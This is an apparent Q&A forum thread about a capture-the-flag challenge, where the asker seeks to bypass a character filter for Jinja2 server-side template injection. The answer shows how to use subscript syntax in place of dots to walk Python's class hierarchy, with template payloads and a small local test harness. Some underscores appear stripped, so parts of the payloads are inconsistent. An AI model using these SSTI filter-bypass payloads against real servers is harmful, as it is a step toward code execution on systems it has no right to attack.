I'm doing a Capture The Flag (CTF) and I'm trying to exploit a server vulnerable to Jinja2 Server Side Template Injection (SSTI).
I can't use the following characters: \, |, ,, . and _.
I'm trying to write the following command:
{{''.class.mro()[1].subclasses()}}
Any ideas?
I tried using the attr method, but I can't use it because of the limitation of using | and ..
Most of what you need here is probably explained in the "Variables" chapter and further explained in the "Implementation" note:
You can use a dot (
.) to access attributes of a variable in addition to the standard Python__getitem__“subscript” syntax ([]).The following lines do the same thing:
{{ foo.bar }} {{ foo['bar'] }}
Source: https://jinja.palletsprojects.com/en/3.1.x/templates/#variables
Then, later:
foo['bar']works mostly the same with a small difference in sequence:
- check for an item
'bar'in foo. (foo.__getitem__('bar'))- if there is not, check for an attribute called bar on foo. (
getattr(foo, 'bar'))- if there is not, return an undefined object.
Source: https://jinja.palletsprojects.com/en/3.1.x/templates/#notes-on-subscriptions
So, if I try this kind of thing on a Jinja environment:
{{ ''['__class__']['mro']()[1] }}
I do indeed get a <class 'object'> as a return.
Here, I was not able to achieve ''['class'], but I can achieve it using dict['class'], on the other hand:
{{ dict['class']['mro']()[1] }}
As for the call to the .subclasses() method, it is unclear if this comes from your example implementation or from somewhere else.
Testing environment:
├── jinja.py
└── templates
└── template.html.j2
jinja.py:
from jinja2 import Environment, FileSystemLoader
environment = Environment(loader=FileSystemLoader('templates/'))
template = environment.get_template('template.html.j2')
print(template.render())
templates/template.html.j2:
{{ dict['class']['mro']()[1] }}
Output:
<class 'object'>